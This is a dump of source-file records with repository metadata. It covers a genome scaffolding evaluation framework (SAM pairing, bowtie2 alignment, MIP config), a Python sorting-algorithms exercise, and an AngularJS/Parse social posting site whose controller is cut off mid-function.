work_dir\n MIP_FILE = \"%s/scaffolds2.txt\" % work_dir\n\n # modify SAM file to be happy with MIP.\n fin1 = open(test1, \"rb\")\n fin2 = open(test2, \"rb\")\n fout1 = open(SAM_1_MOD, \"wb\")\n fout2 = open(SAM_2_MOD, \"wb\")\n for line1 in fin1:\n line2 = fin2.readline()\n \n # tokenize.\n tokens1 = line1.strip().split(\"\\t\")\n tokens2 = line2.strip().split(\"\\t\")\n \n # change naming convention.\n tokens1[0] = tokens1[0].replace(\"/1\",\"_R3\")\n tokens2[0] = tokens2[0].replace(\"/2\",\"_F3\")\n \n # modify orientation.\n if pair_mode == 'rf':\n if tokens1[1] == \"0\":\n tokens1[1] = \"16\"\n else:\n tokens1[1] = \"0\"\n else:\n print pair_mode\n logging.error('un-written')\n sys.exit(1)\n \n \n # write it back out.\n fout1.write('\\t'.join(tokens1) + '\\n')\n fout2.write('\\t'.join(tokens2) + '\\n')\n\n fin1.close() \n fin2.close() \n fout1.close() \n fout2.close() \n\n PROG_1 = \"/opt/mip/scripts/merge.sh\"\n PROG_2 = \"/opt/mip/scripts/filter-mappings.sh\"\n PROG_3 = \"/home/jrl03001/code/ScafValidate/mip/contig_coverage.py\"\n #'''\n # merge data.\n with open(pre_sh, 'wb') as fout:\n \n # prepare.\n fout.write('#!/bin/bash\\n')\n cmd = [PROG_1, SAM_2_MOD, SAM_1_MOD, MERGED_FILE]\n fout.write(' '.join(cmd) + '\\n')\n cmd = [PROG_2, MERGED1_FILE, MERGED2_FILE, FILTERED_FILE]\n fout.write(' '.join(cmd) + '\\n')\n cmd = [\"python\", PROG_3, contig_file, COV_FILE, SAM_1_MOD, SAM_2_MOD]\n fout.write(' '.join(cmd) + '\\n')\n \n # run it.\n subprocess.call([\"chmod\", \"u+x\", pre_sh])\n if subprocess.call([pre_sh], cwd=work_dir) != 0:\n logging.error(\"couldn't prepare MIP\")\n sys.exit(1)\n\n #'''\n # write the config.\n txt = '''# Upper bound for genome length (required)\ngenome_length=5000000000\n\n#parameter specifications for the first stage\n[STAGE]\n# Maximum biconnected component size. (optional)\n#maximum_biconnected_component=50\n# Maximum allowed degree in scaffolding graph. (optional)\nmaximum_degree=50\n# Maximum coverage for nonrepetitive contig. (optional)\n#maximum_coverage=100\n# The maximum overlap between contigs that is allowed without checking for\n# sequence similarity. By default this is set based on the variablility in\n# insert size lengths of each library. (optional)\n#maximum_overlap=100\n# The minimum support for an edge. (optional)\nminimum_support=%i\n# Should edges with negative estimated distance be checked for sequence\n# similarity or removed automatically? (optional)\ncheck_negative_edges=1\n\n# library specification for the first stage\n[LIBRARY]\n# File in SAM format containing mappings for the mate pair reads\n# to the contigs\nmappings=%s\n# Orientation of the mate pairs (in current version must be SOLID)\norientation=SOLID\n# Insert length\ninsert_length=%i\n# Minimum insert length\nmin_insert_length=%i\n# Maximum insert length\nmax_insert_length=%i\n''' % (bundle_size, FILTERED_FILE, ins_size, (ins_size - (3*std_dev)), (ins_size + (3*std_dev)))\n\n \n # write to file.\n fout = open(PARAM_FILE, \"wb\")\n fout.write(txt)\n fout.close()\n" }, { "alpha_fraction": 0.7733333110809326, "alphanum_fraction": 0.7787878513336182, "avg_line_length": 48.93939208984375, "blob_id": "e3a5c0f43aac28f5cb51851c0920604634639204", "content_id": "14d1bf9b18bb635859d30bb1b62a69d27e2d9e97", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1650, "license_type": "permissive", "max_line_length": 233, "num_lines": 33, "path": "/README.md", "repo_name": "jim-bo/scafathon", "src_encoding": "UTF-8", "text": "scafathon\n=========\n\n**Genome scaffolding comparison framework**\n\n\n## Overview\nScafathon is just a collection of scripts used to evaluate three genome scaffolding tools; SILP2, OPERA and MIP. It should be easy to extend this framework to add more tools. It relies on Quast for alignment based accuracy assesment.\n\n***Warning: This code is only intended for use by professionals. Modification of the source code is required to set proper paths to external executables. Furthermore adding additional scaffolding tools requires manual coding.***\n\n## Usage\nThe tool is divided up into several sub-programs which need to be run in-order. Use the \"-h\" argument after each of the following sub-commands for a description of their usage.\n```python\npython silp.py [sub-command] -h\n```\n1. *align:* aligns the paired reads (required bowtie2) installed\n2. *pair:* pairs two existing SAM files\n3. *meta_combine:* combines two pairs of SAM files at different percentages [metagenomic simulations]\n4. *prep:* prepares selected scaffold algorithm by running all preprocessing code\n5. *run:* runs scaffolding tool\n6. *sim_eval:* evaluates scaffold if there exists a reference AGP with locations of each contig\n7. *real_eval:* uses alignment based accuracy metrics\n\n## Installation\nThis is primarily a python program, it relies on several python packages:\n* numpy\n* networkx\n\nAlso several seperate packages are required. These include nucmer, quast and [parabio](https://github.com/jim-bo/parabio).\n\n## Disclaimer\nThis is a research tool written in a research enviroment. No support is offered and bugs may be present. Only one library size is support at this time. \n\n" }, { "alpha_fraction": 0.4289953410625458, "alphanum_fraction": 0.4340822398662567, "avg_line_length": 25.505617141723633, "blob_id": "b981c7a67de36752d838201660e7edad35900281", "content_id": "fd5e0fa3b08a8602cfa93f7b9fc56904188bc8a3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2359, "license_type": "permissive", "max_line_length": 67, "num_lines": 89, "path": "/utils/misc.py", "repo_name": "jim-bo/scafathon", "src_encoding": "UTF-8", "text": "import subprocess\nimport os\nimport numpy as np\n\nagp_dt = np.dtype([\\\n ('scaf_name', 'S255'),\\\n ('scaf_start', np.long),\\\n ('scaf_stop', np.long),\\\n ('scaf_idx', np.long),\\\n ('comp_type', 'S50'),\\\n ('comp_name', 'S255'),\\\n ('comp_start', np.long),\\\n ('comp_stop', np.long),\\\n ('comp_orien', np.long),\\\n ('comp_linkage', np.long),\\\n])\n\n\ndef runit(job, path):\n \"\"\" runs the job \"\"\"\n with open(path, 'wb') as fout:\n fout.write('\\n'.join(job))\n subprocess.call(['chmod', 'a+x', path])\n subprocess.call(['bash', path])\n\ndef create_dir(dir_path):\n ''' creates directory if necessary'''\n if os.path.isdir(dir_path) == False:\n if subprocess.call([\"mkdir\", dir_path]) != 0:\n logging.error(\"couldn't make dir\")\n sys.exit(1)\n\n\n\ndef save_agps(agp_file, agp):\n ''' saves agp to disk.'''\n\n # write to file.\n fout = open(agp_file, \"w\")\n\n # write each entry.\n z = len(agp_dt.names)\n for i in range(agp.size):\n\n # sanity skip.\n if agp[i]['scaf_name'] == \"\":\n continue\n\n # format result.\n tmp = agp[i]\n if tmp['comp_type'] == \"W\":\n # get orientation.\n if tmp[\"comp_orien\"] == 0:\n o = \"+\"\n else:\n o = \"-\"\n\n # write contig.\n txt = str(tmp['scaf_name']) + \"\\t\"\n txt += str(tmp['scaf_start']) + \"\\t\"\n txt += str(tmp['scaf_stop']) + \"\\t\"\n txt += str(tmp['scaf_idx']) + \"\\t\"\n txt += str(tmp['comp_type']) + \"\\t\"\n txt += str(tmp['comp_name']) + \"\\t\"\n txt += str(tmp['comp_start']) + \"\\t\"\n txt += str(tmp['comp_stop']) + \"\\t\"\n txt += o + \"\\n\"\n\n else:\n # get linkage.\n if tmp['comp_linkage'] == 0:\n o = \"no\"\n else:\n o = \"yes\"\n\n # write gap.\n txt = str(tmp['scaf_name']) + \"\\t\"\n txt += str(tmp['scaf_start']) + \"\\t\"\n txt += str(tmp['scaf_stop']) + \"\\t\"\n txt += str(tmp['scaf_idx']) + \"\\t\"\n txt += str(tmp['comp_type']) + \"\\t\"\n txt += str(tmp['comp_stop'] - tmp['comp_start']) + \"\\t\"\n txt += str(tmp['comp_name']) + \"\\t\"\n txt += o + \"\\n\"\n\n fout.write(txt)\n\n # close file.\n fout.close()\n" }, { "alpha_fraction": 0.5159717202186584, "alphanum_fraction": 0.5442575216293335, "avg_line_length": 23.1235294342041, "blob_id": "b480607bf84c02ee5083aaa1ddb0970b00cae73c", "content_id": "d0f3285b47682ee4eb2c1e9f9ed79e596c539994", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8202, "license_type": "permissive", "max_line_length": 105, "num_lines": 340, "path": "/utils/align.py", "repo_name": "jim-bo/scafathon", "src_encoding": "UTF-8", "text": "'''\nalignment utility functions\n'''\nimport os\nimport sys\nimport subprocess\nimport logging\nimport mmap\nfrom operator import itemgetter\nimport numpy as np\n\n## public functions ##\ndef create_idx(asm_fasta, index_file):\n \"\"\" make bowtie2 index\n Parameters:\n -----------\n asm_fasta : str\n index_file : str\n \"\"\"\n\n # run the command.\n subprocess.call(['bowtie2-build', '-f', asm_fasta, index_file])\n\ndef create_aln(size_file, index_file, fastq_file, sam_file, ant_dir, num_cpu):\n \"\"\" make bowtie2 alignment and\n pull out multimappers/\n Parameters:\n -----------\n index_file : str\n fastq_file : str\n \"\"\"\n\n # create sizes.\n sizes = dict()\n with open(size_file, \"rb\") as fin:\n lines = fin.readlines()\n for line in lines:\n sz, name = line.strip().split()\n sz = int(sz)\n sizes[name] = sz\n\n # create the annotation arrays.\n annotes = dict()\n for ref in sizes:\n annotes[ref] = np.zeros(sizes[ref], dtype=np.int)\n\n # create alignment command.\n cmd = ['bowtie2','--reorder', '-k', '10', '-q','-p',str(num_cpu), '-x', index_file, '-U', fastq_file]\n\n # call the command and pipe output.\n output = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n\n # open single-sam file.\n sam_out = open(sam_file, \"wb\")\n\n # loop over each alignment.\n for status, line in _extract_sam(output):\n\n # dump good ones.\n if status == True:\n sam_out.write(line)\n continue\n\n # record location of baduns.\n tokens = line.strip().split()\n start = int(tokens[3])\n stop = start + len(tokens[9])\n rname = tokens[2]\n\n # annotate that.\n annotes[rname][start:stop] += 1\n\n # close output.\n sam_out.close()\n\n # serialize multimap.\n for ref in annotes:\n\n # create name.\n fname = '%s/%s.npy' % (ant_dir, ref)\n\n # look for existing.\n if os.path.isfile(fname):\n tmp = np.load(fname)\n annotes[ref] = annotes[ref] + tmp\n\n # serialize it.\n np.save(fname, annotes[ref])\n\ndef pair_sam(sam_in_1, sam_in_2, sam_out_1, sam_out_2, key_size):\n \"\"\" pairs SAM files \"\"\"\n\n # memory map the SAM files1.\n fin1 = open(sam_in_1, \"r+\")\n fin2 = open(sam_in_2, \"r+\")\n\n map1 = mmap.mmap(fin1.fileno(), 0, access=mmap.ACCESS_COPY)\n map2 = mmap.mmap(fin2.fileno(), 0, access=mmap.ACCESS_COPY)\n\n # create lists from data.\n hitlist1 = list()\n hitlist2 = list()\n for p1, p2 in _sam_gen(map1, map2, key_size):\n hitlist1.append(p1)\n hitlist2.append(p2)\n\n # seek files bake to begining.\n map1.seek(0)\n map2.seek(0)\n\n # sort lists by name, reverse so we can pop from end.\n hitlist1.sort(key=itemgetter(1), reverse=True)\n hitlist2.sort(key=itemgetter(1), reverse=True)\n\n # open output files.\n fout1 = open(sam_out_1, \"wb\")\n fout2 = open(sam_out_2, \"wb\")\n\n # generator of pairs.\n for p1, p2 in _pair_gen(hitlist1, hitlist2):\n\n # load sam info from map.\n map1.seek(p1[0])\n map2.seek(p2[0])\n\n # write out info.\n fout1.write(map1.readline())\n fout2.write(map2.readline())\n\n # close output files.\n fout1.close()\n fout2.close()\n\n # close memmory mapped files.\n map1.close()\n map2.close()\n\n fin1.close()\n fin2.close()\n\n\ndef pair_sam2(sam_in_1, sam_in_2, sam_out_1, sam_out_2, key_size):\n \"\"\" pairs SAM files \"\"\"\n\n # memory map the first SAM file.\n logging.info(\"opening memory map files\")\n\n # build name arrays.\n logging.info(\"extracting name array 1\")\n id1 = _extract_names(sam_in_1, key_size)\n logging.info(\"extracting name array 2\")\n id2 = _extract_names(sam_in_2, key_size)\n\n # sort the names and copy.\n logging.info(\"sorting name array 1\")\n srt1 = np.sort(id1[:]['name'])\n logging.info(\"sorting name array 2\")\n srt2 = np.sort(id2[:]['name'])\n\n # compute unique in each pair.\n logging.info(\"unique 1\")\n uq1 = _numpy_unique(srt1)\n logging.info(\"unique 2\")\n uq2 = _numpy_unique(srt2)\n\n # compute the intersection of unique.\n logging.info(\"intersection\")\n valid_list = np.intersect1d(uq1, uq2, assume_unique=True)\n\n # sanity check.\n assert len(valid_list) != 0, 'cant have no valid stuff'\n\n # create a set.\n logging.info(\"set\")\n valid = set(list(valid_list))\n\n # write the entries.\n logging.info(\"writing\")\n _write_valid(sam_in_1, id1, valid, sam_out_1)\n _write_valid(sam_in_2, id2, valid, sam_out_2)\n logging.info(\"done\")\n\n\n## internal functions ##\n\ndef _write_valid(sam_in_1, id1, valid, sam_out_1):\n \"\"\" writes entries from valid set\"\"\"\n\n # open output.\n fout1 = open(sam_out_1, \"wb\")\n fin1 = open(sam_in_1, \"rb\")\n\n # generator of pairs.\n idx = 0\n for line in fin1:\n\n # operate.\n if id1[idx]['name'] in valid:\n fout1.write(line)\n\n # udpate\n idx += 1\n\n # close em.\n fout1.close()\n fin1.close()\n\ndef _numpy_unique(srt1):\n \"\"\" return unique subset\"\"\"\n\n # create mask.\n good = np.zeros(srt1.shape[0], dtype=np.bool)\n good[:] = False\n\n # iterate over non-boundry cases.\n for i in range(1, srt1.shape[0]-1):\n\n # must not match its neighbors.\n if srt1[i-1] != srt1[i] and srt1[i+1] != srt1[i]:\n good[i] = True\n\n # check the first one.\n if srt1[0] != srt1[1]:\n good[0] = True\n\n # check the last one.\n if srt1[-1] != srt1[-2]:\n good[-1] = True\n\n # return the subset slice.\n return srt1[good]\n\n\ndef _extract_names(file_name, key_size):\n \"\"\" builds numpy array of name hits\"\"\"\n\n # count lines.\n with open(file_name, \"rb\") as fin:\n line_cnt1 = 0\n for line in fin:\n line_cnt1 += 1\n\n # allocate array.\n id1 = np.zeros(line_cnt1, dtype=np.dtype([('name','S25'),('row',np.int)]))\n\n # copy data into array.\n with open(file_name, \"rb\") as fin:\n\n idx = 0\n for line1 in fin:\n # operate.\n if key_size == 0:\n id1[idx]['name'] = line1.split(\"\\t\")[0]\n else:\n id1[idx]['name'] = line1.split(\"\\t\")[0][0:-key_size]\n id1[idx]['row'] = idx\n\n # reset.\n idx += 1\n\n # return the array.\n return id1\n\ndef _extract_sam(output):\n ''' extracts output form SAM'''\n\n # extract unique to file, save multimap annotations.\n for line in iter(output.stdout.readline,''):\n\n # skip header.\n if line[0] == '@': continue\n\n # split.\n tokens = line.strip().split()\n\n # check for no align.\n if tokens[2] == '*':\n continue\n\n # check for MAPQ > 2:\n if int(tokens[4]) < 2:\n yield False, line\n else:\n # its good, yield it.\n yield True, line\n\n\ndef _sam_gen(map1, map2, key_size):\n '''yields the SAM name and the line index'''\n\n # loop till end of file.\n line1 = map1.readline()\n line2 = map2.readline()\n pos1 = 0\n pos2 = 0\n while line1 != '' and line2 != '':\n\n # process it.\n tok1 = line1.strip().split()\n tok2 = line2.strip().split()\n\n # remove to key.\n if key_size != 0:\n key1 = tok1[0][0:-key_size]\n key2 = tok2[0][0:-key_size]\n else:\n key1 = tok1[0]\n key2 = tok2[0]\n\n # yield the name and line number.\n yield (pos1, key1), (pos2, key2)\n\n # update info.\n pos1 += len(line1)\n pos2 += len(line2)\n line1 = map1.readline()\n line2 = map2.readline()\n\ndef _pair_gen(hitlist1, hitlist2):\n ''' does an in-order walk to find pairs '''\n\n # loop till each list is empty.\n while len(hitlist1) > 0 and len(hitlist2) > 0:\n\n # peek for a match.\n if hitlist1[-1][1] == hitlist2[-1][1]:\n\n # yield it.\n yield hitlist1[-1], hitlist2[-1]\n\n # change left.\n hitlist1.pop()\n\n else:\n\n # pop smaller.\n if hitlist1[-1][1] < hitlist2[-1][1]:\n hitlist1.pop()\n else:\n hitlist2.pop()\n" } ]
7
BlackCyn/IshmuratovDaniilVTIP2
https://github.com/BlackCyn/IshmuratovDaniilVTIP2
f7d237be831eb04edbd2aff9b4768d42de7f2cbb
e7cc19f8ad1290ce18e1eab959f8bc96ec794c5a
fb27a87d3666efc19b484a9b300f6df8b2c96527
refs/heads/main
2023-01-10T09:59:35.243515
2020-11-15T05:48:46
2020-11-15T05:48:46
312,966,508
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5271122455596924, "alphanum_fraction": 0.5526931881904602, "avg_line_length": 23.463302612304688, "blob_id": "ec18c590bd8cdc02b3766648520b18353a848259", "content_id": "8f11df4364c75d0d8c0d3fa6d59ac03cacb53b95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6570, "license_type": "no_license", "max_line_length": 100, "num_lines": 218, "path": "/ВТИП2.py", "repo_name": "BlackCyn/IshmuratovDaniilVTIP2", "src_encoding": "UTF-8", "text": "#Сортировка выборкой\r\ndef selection(numbers): \r\n # i = количеству отсортированных значений\r\n for i in range(len(numbers)):\r\n # Исходно считаем наименьшим первый элемент\r\n lowest = i\r\n # Этот цикл перебирает несортированные элементы\r\n for j in range(i + 1, len(numbers)):\r\n if numbers[j] < numbers[lowest]:\r\n lowest = j\r\n # меняем самый маленький элемент в списке на самый первый\r\n numbers[i], numbers[lowest] = numbers[lowest], numbers[i]\r\n\r\n# Проверка\r\nnumb = [4, 2, 55, 123, 22] \r\nselection(numb) \r\nprint(\"Массив, отсортированный выборкой\", numb)\r\n\r\n\r\n\r\n#Пузырьковая сортировка\r\ndef bubble(numbers): \r\n # Присваиваем переменной switch, чтобы цикл запустился хотя бы один раз\r\n switch = True\r\n while switch:\r\n switch = False\r\n for i in range(len(numbers) - 1):\r\n if numbers[i] > numbers[i + 1]:\r\n # Меняем элементы \r\n numbers[i], numbers[i + 1] = numbers[i + 1], numbers[i]\r\n # Устанавливаем switch в True для следующей итерации\r\n switch = True\r\n\r\n# Проверка\r\nnumb = [4, 2, 55, 123, 22] \r\nbubble(numb) \r\nprint(\"Массив, отсортированный методом пузырька\", numb)\r\n\r\n\r\n\r\n#Сортировка вставками\r\ndef insertion(numbers): \r\n for i in range(1, len(numbers)):\r\n item_to_insert = numbers[i]\r\n # Ссылку на индекс предыдущего элемента сохраняем\r\n j = i - 1\r\n # Элементы отсортированного сегмента перемещаем вперёд, если они больше элемента для вставки\r\n while j >= 0 and numbers[j] > item_to_insert:\r\n numbers[j + 1] = numbers[j]\r\n j -= 1\r\n # Вставляем элемент\r\n numbers[j + 1] = item_to_insert\r\n\r\n# Проверка\r\nnumb = [4, 2, 55, 123, 22] \r\ninsertion(numb) \r\nprint(\"Массив, отсортированный методом вставки\", numb)\r\n\r\n\r\n\r\n#Пирамидальная сортировка\r\ndef heapify(numbers, size, index): \r\n # Индекс наибольшего элемента считаем корневым индексом\r\n largest = index\r\n left = (2 * index) + 1\r\n right = (2 * index) + 2\r\n\r\n if left < size and numbers[left] > numbers[largest]:\r\n largest = left\r\n\r\n if right < size and numbers[right] > numbers[largest]:\r\n largest = right\r\n\r\n if largest != index:\r\n numbers[index], numbers[largest] = numbers[largest], numbers[index]\r\n heapify(numbers, size, largest)\r\n\r\ndef heap_sort(nums): \r\n n = len(nums)\r\n\r\n # Создаём Max Heap из списка\r\n for i in range(n, -1, -1):\r\n heapify(nums, n, i)\r\n\r\n # Перемещаем корень Max Heap в конец списка\r\n for i in range(n - 1, 0, -1):\r\n nums[i], nums[0] = nums[0], nums[i]\r\n heapify(nums, i, 0)\r\n\r\n# Проверка\r\nnumb = [4, 2, 55, 123, 22] \r\nheap_sort(numb) \r\nprint(\"Массива отсортированный пирамидальным методов\", numb)\r\n\r\n\r\n\r\n#Быстрая сортировка\r\ndef split(numbers, low, high): \r\n # Cредний элемент выбираем в качестве опорного\r\n\r\n pivot = numbers[(low + high) // 2]\r\n i = low - 1\r\n j = high + 1\r\n while True:\r\n i += 1\r\n while numbers[i] < pivot:\r\n i += 1\r\n\r\n j -= 1\r\n while numbers[j] > pivot:\r\n j -= 1\r\n\r\n if i >= j:\r\n return j\r\n\r\n # Если левый от опорного элемента больше чем правый, меняем их местаими\r\n numbers[i], numbers[j] = numbers[j], numbers[i]\r\n\r\ndef quick1(numbers): \r\n def quick2(items, low, high):\r\n if low < high:\r\n index = split(items, low, high)\r\n quick2(items, low, index)\r\n quick2(items, index + 1, high)\r\n\r\n quick2(numbers, 0, len(numbers) - 1)\r\n\r\n# Проверка\r\nnumb = [4, 2, 55, 123, 22] \r\nquick1(numb) \r\nprint(\"Массив, отсортированный методом быстрой сортировки\", numb) \r\n\r\n\r\n\r\n#Сортировка методом слияния\r\ndef merge(left, right): \r\n sorted = []\r\n left_index = right_index = 0\r\n\r\n left_length, right_length = len(left), len(right)\r\n\r\n for _ in range(left_length + right_length):\r\n if left_index < left_length and right_index < right_length:\r\n # Сравниваем первые элементы в начале каждого списка\r\n\r\n if left[left_index] <= right[right_index]:\r\n sorted.append(left[left_index])\r\n left_index += 1\r\n else:\r\n sorted.append(right[right_index])\r\n right_index += 1\r\n\r\n elif left_index == left_length:\r\n sorted.append(right[right_index])\r\n right_index += 1\r\n\r\n elif right_index == right_length:\r\n sorted.append(left[left_index])\r\n left_index += 1\r\n\r\n return sorted\r\n\r\ndef merge_sort(numbers): \r\n\r\n if len(numbers) <= 1:\r\n return numbers\r\n \r\n mid = len(numbers) // 2\r\n\r\n left = merge_sort(numbers[:mid])\r\n right = merge_sort(numbers[mid:])\r\n\r\n return merge(left, right)\r\n\r\n# Проверка\r\nnumb = [4, 2, 55, 123, 22] \r\nnumb = merge_sort(numb) \r\nprint(\"Массив, отсортированный методом слияния\", numb)\r\n\r\n\r\n\r\n\r\nimport math \r\ndef my_sin (x,n): \r\n x = x/180*math.pi \r\n q = x\r\n s = 0 \r\n for i in range(1, n+1):\r\n s = s+ q\r\n q = q* (-1) * (x*x) / ((2*i+1) * (2*i)) \r\n return s \r\n\r\n\r\n\r\n\r\n\r\ndef f(x):\r\n return 2.718281828459045**(1+x)\r\ndef tailor(x, eps):\r\n x = 1+x\r\n sum = 1+x\r\n term = x;\r\n n = 2;\r\n while term*term > eps*eps:\r\n term *= x/n\r\n n += 1\r\n sum += term\r\n return sum\r\n\r\na=3.0\r\nb=4.0\r\nkrok=(b-a)/10\r\n\r\nwhile a<=b: \r\n print(round(a,2), end=' ')\r\n print(round(f(a),5),end=' ')\r\n print(round(tailor(a,1e-6),5))\r\n a+=krok\r\n" } ]
1
smitthakkar96/Punchit.io_website_master
https://github.com/smitthakkar96/Punchit.io_website_master
94f38b11e93739fc48c9f511fd128530af1f6eba
008dae83b389b5a09b30f882df9ef52d4017be16
d4a619b5f11fcfd48d0e73dfc4556476f8c6ba09
refs/heads/master
2023-01-05T16:48:02.772822
2016-03-05T05:08:49
2016-03-05T05:08:49
50,392,439
1
1
null
2016-01-26T00:58:00
2016-01-30T03:26:11
2022-12-26T20:00:23
JavaScript
[ { "alpha_fraction": 0.642259418964386, "alphanum_fraction": 0.6861924529075623, "avg_line_length": 94.80000305175781, "blob_id": "459f25a606d0475450b932ac225ab8020b90df56", "content_id": "e061ccb507e037405840d580e127ab29a9c6d9ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 478, "license_type": "no_license", "max_line_length": 380, "num_lines": 5, "path": "/images/logos/punchit.io_files/DdQOHnWx7V2.js", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "/*!CK:97048086!*//*1441684666,*/\n\nif (self.CavalryLogger) { CavalryLogger.start_js([\"TVKMf\"]); }\n\n__d('PaymentTokenProxyUtils',['URI'],function a(b,c,d,e,f,g,h){if(c.__markCompiled)c.__markCompiled();var i={getURI:function(j){var k=new h('/ajax/payment/token_proxy.php').setDomain(window.location.hostname).setProtocol('https').addQueryData(j),l=k.getDomain().split('.');if(l.indexOf('secure')<0){l.splice(1,0,'secure');k.setDomain(l.join('.'));}return k;}};f.exports=i;},null);" }, { "alpha_fraction": 0.5920848250389099, "alphanum_fraction": 0.6048547625541687, "avg_line_length": 26.922222137451172, "blob_id": "7b89cc119595c869b8d3d935d866cf4801dae8b8", "content_id": "3a10b86cb962cf4308c5a09caef0200b16692f38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 27643, "license_type": "no_license", "max_line_length": 168, "num_lines": 990, "path": "/js/controllers.js", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "var app = angular.module('app.controllers',[]);\n\napp.filter('unique', function() {\n return function(collection, keyname) {\n var output = [],\n keys = [];\n\n angular.forEach(collection, function(item) {\n var key = item[keyname];\n if(keys.indexOf(key) === -1) {\n keys.push(key);\n output.push(item);\n }\n });\n\n return output;\n };\n});\n\napp.controller('myCtrl',['$scope','$http','Model',function($scope,$http,Model) {\n\t$scope.text = \"ddd\";\n\t// $scope.Data = Data\n\tParse.initialize(\"Y4Txek5e5lKnGzkArbcNMVKqMHyaTk3XR6COOpg4\", \"fR1P17QhE9b7PKOa1wXozi0yo8IAlYLSIzqYh4EU\");\n\t$http.get('/GetSessionToken')\n\t.then(function(response) {\n\t\t// console.log(response.data);\n\tParse.User.become(response.data)\n\t})\n\tvar current_user = Parse.User.current()\n\t$scope.Name = current_user.get(\"Ninja_name\")\n\t$scope.ProfilePicture_url = current_user.get(\"ProfilePicture\").url();\n\t\t$scope.logout = function() {\n\t\t\t// console.log(\"clicked\")\n\t\t\t\t$http({\n\t\t\t\t\tmethod: 'GET',\n\t\t\t\t\t\turl: '/logout'\n\t\t\t\t\t\t}).then(function successCallback(response) {\n\t\t\t\t\t\t}, function errorCallback(response) {\n\t\t\t\t\t\t// called asynchronously if an error occurs\n\t\t\t\t\t\t// or server returns response with an error status.\n\t\t\t\t\t});\n\t};\n\t$scope.$watch('Value',function(){\n\t\t\tModel.Value = $scope.Value\n\t},true)\n\t}])\n\napp.controller('bodyCtrl',function($scope,$http,PostService,Model,Search) {\n\tPusher.log = function(message) {\n\t\tif (window.console && window.console.log) {\n\t\t\twindow.console.log(message);\n\t\t}\n\t};\n try{\n\t var newPunches = document.getElementById('newPunches')\n\tnewPunches.style.display = 'none'\n}\ncatch(e)\n{\n\n}\n\tvar pusher = new Pusher('2f8f1cab459e648a27fd', {\n\t\tencrypted: true\n\t});\n\tvar channel = pusher.subscribe('PostChannel');\n\tchannel.bind('NewUpdate', function(data) {\n\tvar prom = PostService.GetSinglePost(data.message)\n\tprom.then(function(newPost){\n\t\t// console.log(JSON.stringify(newPost));\n\t\tArray.prototype.insert = function (index, item) {\n\t\t this.splice(index, 0, item);\n\t\t};\n\t\tvar newPunches = document.getElementById('newPunches')\n\t\tnewPunches.style.display = 'block'\n // unshift(Data[0])\n // ($scope.$$phase || $scope.$root.$$phase) ? unshift() : $scope.$apply(unshift);\n $scope.posts.unshift(newPost)\n //console.log($scope.posts);\n })\n\t})\n if(location.href.split('/').indexOf(\"share\") != -1)\n {\n var objectId = location.href.split('/')[location.href.split('/').indexOf(\"share\") + 1]\n //console.log(objectId);\n var myprom = PostService.GetSinglePost(objectId)\n myprom.then(function(Data){\n // console.log(JSON.stringify(Data));\n // unshift(Data[0])\n $scope.SinglePost = Data[0]\n //console.log($scope.posts);\n })\n }\n\n\tfunction detectmob() {\n\t if( navigator.userAgent.match(/Android/i)\n\t || navigator.userAgent.match(/webOS/i)\n\t || navigator.userAgent.match(/iPhone/i)\n\t || navigator.userAgent.match(/iPad/i)\n\t || navigator.userAgent.match(/iPod/i)\n\t || navigator.userAgent.match(/BlackBerry/i)\n\t || navigator.userAgent.match(/Windows Phone/i)\n\t ){\n\t return true;\n\t }\n\t else {\n\t return false;\n\t }\n\t}\n\tvar url = document.URL\n\tif(url.indexOf(\"Posts\")!=-1)\n\t{\n\t\tvar objectId = url.split('/')[2];\n\t\tvar SinglePostPromise = PostService.GetSinglePost(\"8pzy70zCXr\")\n\t\tSinglePostPromise.then(function(Data){\n\t\t\t$scope.SinglePost = Data[0]\n\t\t})\n\t}\n\t$scope.Enter = function(isChecked){\n\t\tif(isChecked)\n\t\t{\n\t\t\t$scope.PostComment();\n\t\t}\n\t}\n\tif(detectmob())\n\t{\n\t\t$scope.width = \"100%\";\n\t}\n\telse {\n\t\t$scope.width=\"70%\"\n\t}\n\n\t$scope.posts = new Array()\n\t$scope.PostsVisibility = true\n\t$scope.$watch(function(){return Model.Value},function(){\n\t\tif(Model.Value != null && Model.Value!='undefined'){\n\t\tvar SearchPromise = Search.SearchAccordingToKeyWord(Model.Value)\n\t\tSearchPromise.then(function(SearchResults){\n\t\t\t$scope.posts = SearchResults\n\t\t})\n\t}\n\telse {\n\t\t$scope.Posts = $scope.backup\n\t}\n\t},true)\n\ttry {\n\t\tvar spinner = document.getElementById('spinner')\n\t\tspinner.style.display = 'block'\n\t\tvar LoadMore = document.getElementById('LoadMore')\n\t\tLoadMore.style.display = 'none'\n\n\t} catch (e) {\n\n\t} finally {\n\n\t}\nvar promise = PostService.GetPosts([])\npromise.then(\nfunction(Data){\n\t$scope.posts = Data\n\t$scope.backup = $scope.posts\n\t$scope.PostsVisibility = false;\n\t\t\ttry {\n\t\t\t\tvar spinner = document.getElementById('spinner')\n\t\t\t\tspinner.style.display = 'none'\n\t\t\t\t\t\t\t\t\t // LoadMore\n\t\t\t\tvar LoadMore = document.getElementById('LoadMore')\n\t\t\t\tLoadMore.style.display = 'block'\n\t\t\t} catch (e) {\n\t\t\t\t// console.log(e);\n\t\t\t} finally {\n\n\t\t\t}\t\t\t //spinner\n},function(reason){\n //console.log(reason);\n},function (update) {\n //console.log(\"Update\");\n $scope.posts = update\n});\n\n\t$scope.openComment = function(index) {\n\t\t// console.log(\"df\");\n\t\t$('#modal1').openModal();\n\t\tGetComments($scope.posts[index].id)\n\n\t}\n\t$scope.LoadMore = function () {\n\t\t// console.log(\"clicked\");\n\t\t//spinner\n\t\tvar spinner = document.getElementById('spinner')\n\t\tspinner.style.display = 'block'\n\t\t// LoadMore\n\t\tvar LoadMore = 